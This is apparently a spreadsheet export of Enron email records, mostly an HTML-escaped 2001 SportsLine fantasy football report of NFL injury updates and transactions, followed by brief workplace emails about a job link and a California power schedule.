&lt;FONT SIZE=2&gt;Alexander (leg) was placed on injured reserve, officially ending his season. Walter Rasby will continue to start in his place, but Zeron Flemister has emerged as the team's best receiving tight end with Alexander out. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=12429&amp;"&gt;&lt;B&gt;Matt Hasselbeck&lt;/B&gt;&lt;/A&gt;, QB SEA - Bass/Hull &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;The &lt;i&gt;Seattle Times&lt;/i&gt; says Hasselbeck's season might be over. Mike Holmgren said he would only use him in an emergency this week, and the Seahawks coach may elect to have Hasselbeck use the season's final two games to rest his injured shoulder. Trent Dilfer will start at San Diego this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=133462&amp;"&gt;&lt;B&gt;Amos Zereoue&lt;/B&gt;&lt;/A&gt;_x000D_
, RB PIT - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Zereoue missed practice on Wednesday with a shoulder injury. He is listed as probable for this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=1871&amp;"&gt;&lt;B&gt;Todd Bouman&lt;/B&gt;&lt;/A&gt;, QB MIN - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Bouman practiced without pads on Wednesday. If he cannot practice fully on Thursday, Spergon Wynn will get the start this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=1235&amp;"&gt;&lt;B&gt;Keenan McCardell&lt;/B&gt;&lt;/A&gt;, WR JAC - Neal/McKay &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
McCardell is listed as probable with a thigh injury. He should be able to start this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=235203&amp;"&gt;&lt;B&gt;Chris Chambers&lt;/B&gt;&lt;/A&gt;, WR MIA - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Chambers is listed as questionable with an ankle injury. He practiced on Wednesday and should be able to play this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=1288&amp;"&gt;&lt;B&gt;James McKnight&lt;/B&gt;&lt;/A&gt;, WR MIA - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;McKnight is listed as questionable with an ankle injury. He practiced and is hopeful of playing this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=235123&amp;"&gt;&lt;B&gt;Travis Minor&lt;/B&gt;&lt;/A&gt;, RB MIA - Giggles &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;The &lt;i&gt;Miami Herald&lt;/i&gt; reports Minor will get more work on offense this week. Lamar Smith will remain the starter, but the Dolphins are hoping Minor can inject some life into the offense. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=1116&amp;"&gt;&lt;B&gt;James Stewart&lt;/B&gt;&lt;/A&gt;, RB DET - Hunter &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;The &lt;i&gt;Detroit Free Press&lt;/i&gt; says Stewart is not expected to play this week because of a sprained ankle. Lamont Warren and Cory Schlesinger will assume most of the workload in his place. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=235119&amp;"&gt;&lt;B&gt;Mike McMahon&lt;/B&gt;&lt;/A&gt;, QB DET - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;The &lt;i&gt;Detroit Free Press&lt;/i&gt; says McMahon is not expected to practice or play this week. Ty Detmer will start in his place. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=12409&amp;"&gt;&lt;B&gt;Brian Griese&lt;/B&gt;&lt;/A&gt;, QB DEN - Matty &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Griese told the &lt;i&gt;Denver Post&lt;/i&gt; he is ready to take on the Broncos, although Mike Shanahan questioned how effective he would be in his return. "How do you know with a concussion?" Shanahan said. "There should be no side effects. Hopefully there's not. But we have learned a lot through the years about concussions and how serious the!_x000D_
y !_x000D_
can be, and hopefully that's something in the past and they won't reoccur." &lt;/FONT&gt;_x000D_
&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=187642&amp;"&gt;&lt;B&gt;Aaron Shea&lt;/B&gt;&lt;/A&gt;, TE CLE - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Shea is expected to miss the season's final two games with a shoulder injury. O.J. Santiago should remain in the starting lineup in Shea's place. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=133415&amp;"&gt;&lt;B&gt;Akili Smith&lt;/B&gt;&lt;/A&gt;, QB CIN - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Smith underwent surgery on his left hamstring. He is expected to be ready for training camp next season and will compete for the starting job. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=1321&amp;"&gt;&lt;B&gt;Wesley Walls&lt;/B&gt;&lt;/A&gt;, TE CAR - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Walls is listed as questionable with a knee injury. He was expected to be evaluated again on Thursday. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=1203&amp;"&gt;&lt;B&gt;Muhsin Muhammad&lt;/B&gt;&lt;/A&gt;, WR CAR - Martin &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Muhammad (turf toe) is not expected to play this week, and may miss the rest of the season. Isaac Byrd will likely start in his place again. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=235216&amp;"&gt;&lt;B&gt;Travis Henry&lt;/B&gt;&lt;/A&gt;, RB BUF - Martin &lt;FONT SIZE=1&gt;_x000D_
Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Henry will sit out again this week with a sprained knee. Shawn Bryson will start for the second consecutive week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=1069&amp;"&gt;&lt;B&gt;Steve McNair&lt;/B&gt;&lt;/A&gt;, QB TEN - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;McNair missed practice Wednesday because of back pain.   "I'm going to try to do some things tomorrow and hope it loosens up and not have as much pain as I had today," McNair said.   "I'm not going to go out and try to force the issue. If it's still sore and still tight where I can't have all my mechanics right, I'm not going to force the issue."     The Titans listed him as questionable yet again Wednesday, but McNair likely will play &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=1152&amp;"&gt;&lt;B&gt;Jerome Bettis&lt;/B&gt;&lt;/A&gt;, RB PIT - Giggles &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Bettis sat out Wednesday's practice, and indicated he might not play in the regular season's final two games. "You want to take care of the injury first and if that means not playing, that means not playing," Bettis told the &lt;i&gt;Pittsburgh Post-Gazette&lt;/i&gt;. "But you want to make sure you're healed up. The team playing as well as it has played allows me the opportunity to get healthy. I'm using it very, very wisely." &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=133297&amp;"&gt;&lt;B&gt;Martin Gramatica&lt;/B&gt;&lt;/A&gt;, K TB - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
Gramatica sat out practice Wednesday, but is expected to test his injured leg on Thursday. Doug Brien and Brad Daluiso worked out Wednesday for the Buccaneers, who might sign one if Martin Gramatica can't kick against the Baltimore Ravens this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=12429&amp;"&gt;&lt;B&gt;Matt Hasselbeck&lt;/B&gt;&lt;/A&gt;, QB SEA - Bass/Hull &lt;FONT SIZE=1&gt;Updated 12/26/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Trent Dilfer will start this week in place of Hasselbeck, whose separated left shoulder is too sore for him to play.    Coach Mike Holmgren said Wednesday that Hasselbeck aggravated the injury, which he's had since the third week of the season, against the New York Giants last Sunday.   "There's a chance I might have him and he could play in an emergency-type situation, but he's pretty sore," Holmgren said.  &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=1116&amp;"&gt;&lt;B&gt;James Stewart&lt;/B&gt;&lt;/A&gt;, RB DET - Hunter &lt;FONT SIZE=1&gt;Updated 12/26/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Stewart is day to day with a sprained ankle. His status for this week's game is unclear. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=1264&amp;"&gt;&lt;B&gt;Jeff Graham&lt;/B&gt;&lt;/A&gt;, WR SD - Free Agent &lt;FONT SIZE=1&gt;Updated 12/26/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Graham may miss his second consecutive game this week because of the death of his father. With Tim Dwight (lung) still ailing, Trevor Gaylor may have to start again. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=12436&amp;"&gt;&lt;B&gt;Skip Hicks&lt;/B&gt;&lt;/A&gt;_x000D_
, RB TEN - Free Agent &lt;FONT SIZE=1&gt;Updated 12/26/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Hicks is expected to miss this week's game with a hamstring injury, and may miss the rest of the season. Eddie George should assume a regular workload once again. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=1094&amp;"&gt;&lt;B&gt;Emmitt Smith&lt;/B&gt;&lt;/A&gt;, RB DAL - Bass/Hull &lt;FONT SIZE=1&gt;Updated 12/26/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Smith is day to day with a hip injury. He is expected to play this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=187401&amp;"&gt;&lt;B&gt;Peter Warrick&lt;/B&gt;&lt;/A&gt;, WR CIN - Giggles &lt;FONT SIZE=1&gt;Updated 12/26/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
Warrick, who was benched late in last week's game, is expected to start. He has been a disappointment this year and Fantasy players should not use him at this point of the postseason.  &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=1871&amp;"&gt;&lt;B&gt;Todd Bouman&lt;/B&gt;&lt;/A&gt;, QB MIN - Free Agent &lt;FONT SIZE=1&gt;Updated 12/26/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Bouman (thumb) may attempt to practice late in the week. His status remains unclear for this week's game, and Spergon Wynn is available to start if needed. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=pro-player-updates&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;start=30&amp;"&gt;More Updates&lt;/A&gt;&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;NFL Reports,&amp;nbsp;Transactions&amp;nbsp;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&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BGCOLOR=#e0e6df WIDTH=100% CELLPADDING=1 CELLSPACING=0 BORDER=0&gt;&lt;TR&gt;&lt;TD ALIGN=middle&gt;&lt;FONT SIZE=2 COLOR="#000000" FACE="Arial, Helvetica"&gt;&lt;B&gt;12/26&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;pro_team=1&amp;"&gt;&lt;B&gt;Arizona Cardinals&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Placed guard Pete Kendall on injured reserve; signed tight end-long snapper Nathaqn Hodel from the practice squad. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;pro_team=10&amp;"&gt;&lt;B&gt;Detroit Lions&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Signed linebacker Eugene McCaslin to the practice squad. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;pro_team=14&amp;"&gt;&lt;B&gt;Kansas City Chiefs&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Agreed to terms on a three-year contract with wide receiver &lt;A HREF=players?league=bige01&amp;owner=78977.7&amp;key=1517&gt;Reggie Jones&lt;/A&gt;; signed cornerback Ahmad Hawkins to the practice squad. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;pro_team=15&amp;"&gt;&lt;B&gt;Miami Dolphins&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Signed linebacker &lt;A HREF=players?league=bige01&amp;owner=78977.7&amp;key=135446&gt;Corey Moore&lt;/A&gt; to a two-year contract; placed linebacker Derrick Rodgers on injured reserve. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;TABLE BGCOLOR=#e0e6df WIDTH=100% CELLPADDING=1 CELLSPACING=0 BORDER=0&gt;&lt;TR&gt;&lt;TD ALIGN=middle&gt;&lt;FONT SIZE=2 COLOR="#000000" FACE="Arial, Helvetica"&gt;&lt;B&gt;12/24&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;pro_team=9&amp;"&gt;&lt;B&gt;Denver Broncos&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Waived wide receiver &lt;A HREF=players?league=bige01&amp;owner=78977.7&amp;key=1779&gt;Keith Poole&lt;/A&gt;; signed cornerback Delvin Hughley and guard Michael Moore.&lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;TABLE BGCOLOR=#e0e6df WIDTH=100% CELLPADDING=1 CELLSPACING=0 BORDER=0&gt;&lt;TR&gt;&lt;TD ALIGN=middle&gt;&lt;FONT SIZE=2 COLOR="#000000" FACE="Arial, Helvetica"&gt;&lt;B&gt;12/23&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;pro_team=14&amp;"&gt;&lt;B&gt;Kansas City Chiefs&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Signed safety Shaunard Harris from the practice squad. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;TABLE BGCOLOR=#e0e6df WIDTH=100% CELLPADDING=1 CELLSPACING=0 BORDER=0&gt;&lt;TR&gt;&lt;TD ALIGN=middle&gt;&lt;FONT SIZE=2 COLOR="#000000" FACE="Arial, Helvetica"&gt;&lt;B&gt;12/21&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;B&gt;NFL&lt;/B&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Fined Minnesota &lt;A HREF=players?league=bige01&amp;owner=78977.7&amp;key=16&gt;Vikings&lt;/A&gt; receiver &lt;A HREF=players?league=bige01&amp;owner=78977.7&amp;key=12576&gt;Randy Moss&lt;/A&gt; &amp;#36;10,000 for a repeated taunting offense in a December 16 game against Detroit; fined Kansas City &lt;A HREF=players?league=bige01&amp;owner=78977.7&amp;key=14&gt;Chiefs&lt;/A&gt; linebacker Donnie Edwards &amp;#36;12,500 for an unnecessary roughness penalty in a December 16 game against Denver. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;Transactions,&amp;nbsp;View&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CENTER&gt;&lt;TABLE BGCOLOR="#bfbfbf" BORDER=2 CELLSPACING=0 CELLPADDING=0&gt;&lt;TR&gt;&lt;TD&gt;_x000D_
&lt;TABLE BORDER=0 CELLSPACING=0 CELLPADDING=2&gt;_x000D_
&lt;TR BGCOLOR=#00007f&gt;_x000D_
&lt;TD COLSPAN=3&gt;_x000D_
&lt;TABLE WIDTH=100% BORDER=0 CELLSPACING=0 CELLPADDING=0&gt;_x000D_
&lt;TR&gt;&lt;TD VALIGN=middle ALIGN=left&gt;&lt;IMG HSPACE=2 VSPACE=2 WIDTH=14 HEIGHT=14 SRC="http://images.commissioner.com/images/eye_device_tiny.gif"&gt;&amp;nbsp;&lt;FONT SIZE=2&gt;&lt;FONT COLOR="#ffffff"&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;B&gt;Make Selection&lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;_x000D_
&lt;/TD&gt;_x000D_
&lt;TD ALIGN=right VALIGN=middle&gt;_x000D_
&amp;nbsp;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=home&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;"&gt;&lt;IMG BORDER=0 ALIGN=absmiddle HSPACE=2 SRC="http://images.commissioner.com/images/wizard/win95/x.gif"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;_x000D_
&lt;TD WIDTH=25&gt;&lt;BR&gt;&lt;/TD&gt;_x000D_
&lt;TD WIDTH=400 HEIGHT=200&gt;&lt;FONT FACE="Arial, Helvetica" SIZE=2&gt;&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;&lt;TR&gt;&lt;TD WIDTH=10&gt;&lt;/TD&gt;&lt;TD WIDTH=60&gt;&lt;IMG ALIGN=middle SRC="http://images.commissioner.com/images/wizard/i.gif"&gt;&lt;/TD&gt;&lt;TD&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;There are no League Transactions which meet the selected criteria.&lt;BR&gt;&lt;BR&gt;To see all league transactions select "All", "All", "All Teams" from_x000D_
the Transactions, View page.&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/FONT&gt;&lt;/TD&gt;_x000D_
&lt;TD WIDTH=25&gt;&lt;BR&gt;&lt;/TD&gt;_x000D_
&lt;/TR&gt;&lt;/TABLE&gt;_x000D_
&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;_x000D_
&lt;/CENTER&gt;&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;Schedule,&amp;nbsp;Breakdown&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IMG WIDTH=1px HEIGHT=1px SRC="http://football299.fantasy.sportsline.com/mp/open_gif?splnid=a19005403f578c92&amp;league=bige01&amp;owner=78977.7&amp;email=ab5b8ea5028052929ae4cc1b331de915cbc1d75c848a6b6068e33e6a475f22f5&amp;sport=football&amp;vend=CBS%20SportsLine.com&amp;product=mgmt&amp;time=20011228&amp;type=ereport&amp;random=3837"&gt;&lt;HR&gt;&lt;CENTER&gt;Copyright 2001 Commissioner.COM Inc and SportsLine.com Inc.&lt;BR&gt;Your site can be reached from &lt;A HREF=http://fantasy.sportsline.com&gt;http://fantasy.sportsline.com&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;FB10SP&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 02:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'todd.perry@enron.com'})</t>
  </si>
  <si>
    <t>Just in case Enron doesn't work out for you.....</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kate Symes/PDX/ECT on 04/11/2001 09:56 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Anna Symes &lt;annasymes@yahoo.com&gt; on 04/11/2001 09:54:14 AM_x000D_
To: "Kate.Symes@enron.com" &lt;Kate.Symes@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: I thought you might be interested..._x000D_
_x000D_
_x000D_
  To: Kate.Symes@enron.com_x000D_
From: Anna Symes_x000D_
_x000D_
I thought you might be interested in this job.  It's just one of the_x000D_
more than 250,000 great jobs on Headhunter.net:_x000D_
_x000D_
  http://www.headhunter.net/share/det.asp?d=J26K66D0YJBB4DWPWJ_x000D_
_x000D_
Comments:_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 Jan 2002 15:12:31 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'albert.meyers@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'craig.dean@enron.com'})</t>
  </si>
  <si>
    <t>FW: DA ahead Cali schedule taken to the HA market 01/02/02</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Meyers, Albert  _x000D_
Sent:	Tuesday, January 01, 2002 12:27 PM_x000D_
To:	Solberg, Geir; Williams III, Bill_x000D_
Cc:	DL-Portland Volume Mgmt_x000D_
Subject:	DA ahead Cali schedule taken to the HA market 01/02/02_x000D_
_x000D_
To whom it may concern:_x000D_
_x000D_
For January 2, 2002, the in order to pass phase II within the CISO market, I agreed to take a schedule from the DA to the HA in NP15 with the APX.  The schedule is for 17mw on peak.  I built a load zone in PGE3 (ST Cali) and took the trade with the APX to zero.  Please be sure to reempliment the original schedule.  I spoke with Max @ the APX and the schedule was changed because the APX could not verify the schedule with their customer (Sierra Pacific Holdings).  If you have any questions please give me a call._x000D_
_x000D_
Bert</t>
  </si>
  <si>
    <t>Tue, 27 Jun 2000 07:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Tonight</t>
  </si>
  <si>
    <t>we are bringing our entertaining pics</t>
  </si>
  <si>
    <t>Fri, 11 Jan 2002 12:16:02 -0800 (PST)</t>
  </si>
  <si>
